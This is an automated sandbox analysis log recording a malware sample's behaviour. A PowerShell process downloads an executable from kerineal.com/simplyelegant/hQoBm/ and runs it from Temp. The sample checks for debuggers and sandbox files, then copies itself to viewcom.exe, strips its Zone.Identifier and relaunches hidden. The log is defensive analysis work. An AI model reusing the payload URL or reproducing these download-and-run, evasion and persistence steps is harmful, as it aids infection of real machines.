| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM |
|
1 | |
| Socket | Connect | remote_address = 184.168.152.148, remote_port = 80 |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 82, size_out = 82 |
|
1 | |
| Inet | Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Inet | Open Connection | protocol = http, server_name = kerineal.com, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /simplyelegant/hQoBm/ |
|
1 | |
| Inet | Send HTTP Request | headers = host: kerineal.com, connection: Keep-Alive, url = kerineal.com/simplyelegant/hQoBm/ |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 4096, size_out = 4096 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 4096 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 3164 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 3164 |
|
1 | |
| File | Write | filename = C:\Users\ATVeyDl98Z\AppData\Local\Temp\38763.exe, size = 4096 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 59532 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 59532 |
|
1 | |
| File | Write | filename = C:\Users\ATVeyDl98Z\AppData\Local\Temp\38763.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\ATVeyDl98Z\AppData\Local\Temp\38763.exe, size = 58251 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 19573, size_out = 8712 |
|
1 | |
| Inet | Read Response | size = 19573, size_out = 8712 |
|
1 | |
| File | Write | filename = C:\Users\ATVeyDl98Z\AppData\Local\Temp\38763.exe, size = 8712 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 10861, size_out = 3752 |
|
1 | |
| Inet | Read Response | size = 10861, size_out = 3752 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 7109, size_out = 604 |
|
1 | |
| Inet | Read Response | size = 7109, size_out = 604 |
|
1 | |
| File | Write | filename = C:\Users\ATVeyDl98Z\AppData\Local\Temp\38763.exe, size = 4096 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 6505, size_out = 6505 |
|
1 | |
| Inet | Read Response | size = 6505, size_out = 6505 |
|
1 | |
| File | Write | filename = C:\Users\ATVeyDl98Z\AppData\Local\Temp\38763.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\ATVeyDl98Z\AppData\Local\Temp\38763.exe, size = 2669 |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Temp\38763.exe, type = file_attributes |
|
3 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\Desktop, type = file_attributes |
|
2 | |
| Process | Get Info | type = PROCESS_BASIC_INFORMATION |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Process | Create | process_name = C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe, show_window = SW_SHOWNORMAL |
|
1 |
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\users\atveyd~1\appdata\local\temp\38763.exe |
| Command Line | "C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe" |
| Initial Working Directory | C:\Users\ATVeyDl98Z\Desktop\ |
| Monitor | Start Time: 00:00:54, Reason: Child Process |
| Unmonitor | End Time: 00:02:34, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:40 |
| Information | Value |
|---|---|
| PID | 0xb60 |
| Parent PID | 0xad4 (c:\windows\system32\windowspowershell\v1.0\powershell.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ZJEWV7F\ATVeyDl98Z |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B64
0x
B68
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fd10 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fd50 |
|
1 | |
| Module | Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0x12fd6c |
|
1 | |
| Module | Get Address | function = GetProcAddress, ordinal = 0, address_out = 0x12fd6c |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fd6c |
|
1 | |
| Module | Get Address | function = VirtualProtect, ordinal = 0, address_out = 0x12fd6c |
|
1 | |
| Module | Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x12fd6c |
|
1 | |
| Module | Get Address | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x12fd6c |
|
1 | |
| Module | Get Address | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x12fd6c |
|
1 | |
| Module | Load | module_name = ntdll.dll, base_address = 0x775c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ntdll.dll, function = cos, address_out = 0x77607400 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ntdll.dll, function = sin, address_out = 0x775f41c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ntdll.dll, function = strchr, address_out = 0x77607690 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x76350000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = LoadLibraryA, address_out = 0x763a395c |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = lstrcmpA, address_out = 0x76388c59 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateFileA, address_out = 0x7639cee8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CloseHandle, address_out = 0x7639ca7c |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetModuleHandleA, address_out = 0x7639cf41 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetModuleFileNameA, address_out = 0x763a33f6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetComputerNameA, address_out = 0x76386ba9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetComputerNameExA, address_out = 0x763df41f |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetCommandLineA, address_out = 0x763a98ff |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FreeConsole, address_out = 0x763fbfde |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = VirtualAlloc, address_out = 0x763a2fb6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76393ea8 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x76030000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = GetUserNameA, address_out = 0x7605a4b4 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x760e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shlwapi.dll, function = StrStrIA, address_out = 0x760ed250 |
|
1 | |
| Debug | Check for Presence | c:\users\atveyd~1\appdata\local\temp\38763.exe |
|
249 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x6f600000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x75ce0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x771e0000 |
|
1 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x6f600000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x75ce0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x771e0000 |
|
1 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x6f600000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x75ce0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x771e0000 |
|
1 | |
| Debug | Check for Presence | c:\users\atveyd~1\appdata\local\temp\38763.exe |
|
249 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x6f600000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x75ce0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x771e0000 |
|
1 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x6f600000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x75ce0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x771e0000 |
|
1 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x6f600000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x75ce0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x771e0000 |
|
1 | |
| System | Get Computer Name | result_out = ZJEWV7F |
|
1 | |
| System | Get Computer Name | result_out = ZjEwV7f, type = ComputerNameDnsHostname |
|
1 | |
| File | Create | filename = C:\email.doc, desired_access = GENERIC_READ |
|
1 | |
| File | Create | filename = C:\a\foobar.bmp, desired_access = GENERIC_READ |
|
1 | |
| Module | Get Handle | module_name = c:\users\atveyd~1\appdata\local\temp\38763.exe, base_address = 0x400000 |
|
1 | |
| Module | Get Filename | module_name = c:\users\atveyd~1\appdata\local\temp\38763.exe, process_name = c:\users\atveyd~1\appdata\local\temp\38763.exe, file_name_orig = C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe, size = 259 |
|
1 | |
| Debug | Check for Presence | c:\users\atveyd~1\appdata\local\temp\38763.exe |
|
249 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x6f600000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x75ce0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x771e0000 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x76350000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = WTSGetActiveConsoleSessionId, address_out = 0x7638480b |
|
1 | |
| Module | Get Filename | process_name = c:\users\atveyd~1\appdata\local\temp\38763.exe, file_name_orig = C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe, size = 260 |
|
1 | |
| Mutex | Create | mutex_name = MF6003E70 |
|
1 | |
| Process | Create | process_name = C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe, os_pid = 0xb74, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE |
|
1 |
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\users\atveyd~1\appdata\local\temp\38763.exe |
| Command Line | "C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe" |
| Initial Working Directory | C:\Users\ATVeyDl98Z\Desktop\ |
| Monitor | Start Time: 00:00:57, Reason: Child Process |
| Unmonitor | End Time: 00:02:34, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:37 |
| Information | Value |
|---|---|
| PID | 0xb74 |
| Parent PID | 0xb60 (c:\users\atveyd~1\appdata\local\temp\38763.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ZJEWV7F\ATVeyDl98Z |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B78
0x
B7C
0x
B80
0x
B84
0x
B88
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe | 84.00 KB (86016 bytes) |
MD5:
1b1e6729790854252dfba6c77f198a4e
SHA1: 327c94b435802f77d12913956b28c70d00ab2de5 SHA256: 3939227998b7986b481eb9bc1a10dd1c5c02fc7ff9edbd25ad86a61307186d98 |
|
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fd10 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fd50 |
|
1 | |
| Module | Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0x12fd6c |
|
1 | |
| Module | Get Address | function = GetProcAddress, ordinal = 0, address_out = 0x12fd6c |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fd6c |
|
1 | |
| Module | Get Address | function = VirtualProtect, ordinal = 0, address_out = 0x12fd6c |
|
1 | |
| Module | Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x12fd6c |
|
1 | |
| Module | Get Address | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x12fd6c |
|
1 | |
| Module | Get Address | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x12fd6c |
|
1 | |
| Module | Load | module_name = ntdll.dll, base_address = 0x775c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ntdll.dll, function = cos, address_out = 0x77607400 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ntdll.dll, function = sin, address_out = 0x775f41c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ntdll.dll, function = strchr, address_out = 0x77607690 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x76350000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = LoadLibraryA, address_out = 0x763a395c |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = lstrcmpA, address_out = 0x76388c59 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateFileA, address_out = 0x7639cee8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CloseHandle, address_out = 0x7639ca7c |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetModuleHandleA, address_out = 0x7639cf41 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetModuleFileNameA, address_out = 0x763a33f6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetComputerNameA, address_out = 0x76386ba9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetComputerNameExA, address_out = 0x763df41f |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetCommandLineA, address_out = 0x763a98ff |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FreeConsole, address_out = 0x763fbfde |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = VirtualAlloc, address_out = 0x763a2fb6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76393ea8 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x76030000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = GetUserNameA, address_out = 0x7605a4b4 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x760e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shlwapi.dll, function = StrStrIA, address_out = 0x760ed250 |
|
1 | |
| Debug | Check for Presence | c:\users\atveyd~1\appdata\local\temp\38763.exe |
|
249 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x6f600000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x75ce0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x771e0000 |
|
1 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x6f600000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x75ce0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x771e0000 |
|
1 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x6f600000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x75ce0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x771e0000 |
|
1 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x6f600000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x75ce0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x771e0000 |
|
1 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x6f600000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x75ce0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x771e0000 |
|
1 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x6f600000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x75ce0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x771e0000 |
|
1 | |
| System | Get Computer Name | result_out = ZJEWV7F |
|
1 | |
| System | Get Computer Name | result_out = ZjEwV7f, type = ComputerNameDnsHostname |
|
1 | |
| File | Create | filename = C:\email.doc, desired_access = GENERIC_READ |
|
1 | |
| File | Create | filename = C:\a\foobar.bmp, desired_access = GENERIC_READ |
|
1 | |
| Module | Get Handle | module_name = c:\users\atveyd~1\appdata\local\temp\38763.exe, base_address = 0x400000 |
|
1 | |
| Module | Get Filename | module_name = c:\users\atveyd~1\appdata\local\temp\38763.exe, process_name = c:\users\atveyd~1\appdata\local\temp\38763.exe, file_name_orig = C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe, size = 259 |
|
1 | |
| Debug | Check for Presence | c:\users\atveyd~1\appdata\local\temp\38763.exe |
|
249 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x6f600000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x75ce0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x771e0000 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x76350000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = WTSGetActiveConsoleSessionId, address_out = 0x7638480b |
|
1 | |
| Module | Get Filename | process_name = c:\users\atveyd~1\appdata\local\temp\38763.exe, file_name_orig = C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe, size = 260 |
|
1 | |
| Mutex | Create | mutex_name = MF6003E70 |
|
1 | |
| Module | Load | module_name = advapi32.dll, base_address = 0x76030000 |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x77460000 |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x764f0000 |
|
1 | |
| Module | Load | module_name = crypt32.dll, base_address = 0x757b0000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x75ce0000 |
|
1 | |
| Module | Load | module_name = userenv.dll, base_address = 0x74dc0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x771e0000 |
|
1 | |
| Module | Load | module_name = wtsapi32.dll, base_address = 0x741a0000 |
|
1 | |
| System | Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Module | Get Filename | process_name = c:\users\atveyd~1\appdata\local\temp\38763.exe, file_name_orig = C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe, size = 260 |
|
1 | |
| Service | Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| File | Create | filename = C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe, filename = C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe, process_name = c:\users\atveyd~1\appdata\local\temp\38763.exe, desired_access = FILE_MAP_READ |
|
1 | |
| File | Get Info | filename = C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe, type = size |
|
1 | |
| Module | Unmap | process_name = c:\users\atveyd~1\appdata\local\temp\38763.exe |
|
1 | |
| System | Get Computer Name | result_out = ZJEWV7F |
|
1 | |
| Mutex | Create | mutex_name = Global\I40F77A1B |
|
1 | |
| Mutex | Create | mutex_name = Global\M40F77A1B |
|
1 | |
| Mutex | Release | mutex_name = Global\I40F77A1B |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| File | Get Info | filename = C:\, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\, type = file_attributes |
|
1 | |
| File | Move | source_filename = C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe, destination_filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe |
|
1 | |
| File | Delete | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe:Zone.Identifier |
|
1 | |
| Process | Create | process_name = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe, os_pid = 0xb8c, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE |
|
1 |
| Information | Value |
|---|---|
| ID | #5 |
| File Name | c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe |
| Command Line | "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" |
| Initial Working Directory | C:\Users\ATVeyDl98Z\Desktop\ |
| Monitor | Start Time: 00:01:01, Reason: Child Process |
| Unmonitor | End Time: 00:02:34, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:33 |
| Information | Value |
|---|---|
| PID | 0xb8c |
| Parent PID | 0xb74 (c:\users\atveyd~1\appdata\local\temp\38763.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ZJEWV7F\ATVeyDl98Z |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B90
0x
B94
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fd10 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fd50 |
|
1 | |
| Module | Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0x12fd6c |
|
1 | |
| Module | Get Address | function = GetProcAddress, ordinal = 0, address_out = 0x12fd6c |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fd6c |
|
1 | |
| Module | Get Address | function = VirtualProtect, ordinal = 0, address_out = 0x12fd6c |
|
1 | |
| Module | Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x12fd6c |
|
1 | |
| Module | Get Address | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x12fd6c |
|
1 | |
| Module | Get Address | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x12fd6c |
|
1 | |
| Module | Load | module_name = ntdll.dll, base_address = 0x775c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ntdll.dll, function = cos, address_out = 0x77607400 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ntdll.dll, function = sin, address_out = 0x775f41c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ntdll.dll, function = strchr, address_out = 0x77607690 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x76350000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = LoadLibraryA, address_out = 0x763a395c |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = lstrcmpA, address_out = 0x76388c59 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateFileA, address_out = 0x7639cee8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CloseHandle, address_out = 0x7639ca7c |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetModuleHandleA, address_out = 0x7639cf41 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetModuleFileNameA, address_out = 0x763a33f6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetComputerNameA, address_out = 0x76386ba9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetComputerNameExA, address_out = 0x763df41f |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetCommandLineA, address_out = 0x763a98ff |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FreeConsole, address_out = 0x763fbfde |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = VirtualAlloc, address_out = 0x763a2fb6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76393ea8 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x76030000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = GetUserNameA, address_out = 0x7605a4b4 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x760e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shlwapi.dll, function = StrStrIA, address_out = 0x760ed250 |
|
1 | |
| Debug | Check for Presence | c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe |
|
249 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x6f600000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x75ce0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x771e0000 |
|
1 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x6f600000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x75ce0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x771e0000 |
|
1 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x6f600000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x75ce0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x771e0000 |
|
1 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x6f600000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x75ce0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x771e0000 |
|
1 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x6f600000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x75ce0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x771e0000 |
|
1 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x6f600000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x75ce0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x771e0000 |
|
1 | |
| System | Get Computer Name | result_out = ZJEWV7F |
|
1 | |
| System | Get Computer Name | result_out = ZjEwV7f, type = ComputerNameDnsHostname |
|
1 | |
| File | Create | filename = C:\email.doc, desired_access = GENERIC_READ |
|
1 | |
| File | Create | filename = C:\a\foobar.bmp, desired_access = GENERIC_READ |
|
1 | |
| Module | Get Handle | module_name = c:\users\atveyd~1\appdata\local\temp\38763.exe, base_address = 0x400000 |
|
1 | |
| Module | Get Filename | module_name = c:\users\atveyd~1\appdata\local\temp\38763.exe, process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe, size = 259 |
|
1 | |
| Debug | Check for Presence | c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe |
|
249 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x6f600000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x75ce0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x771e0000 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x76350000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = WTSGetActiveConsoleSessionId, address_out = 0x7638480b |
|
1 | |
| Module | Get Filename | process_name = c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe, file_name_orig = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe, size = 260 |
|
1 | |
| Mutex | Create | mutex_name = M68B1B0D0 |
|
1 | |
| Process | Create | process_name = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe, os_pid = 0xb98, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE |
|
1 |
| Information | Value |
|---|---|
| ID | #6 |
| File Name | c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe |
| Command Line | "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" |
| Initial Working Directory | C:\Users\ATVeyDl98Z\Desktop\ |
| Monitor | Start Time: 00:01:04, Reason: Child Process |
| Unmonitor | End Time: 00:02:34, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:30 |
| Information | Value |
|---|---|
| PID | 0xb98 |
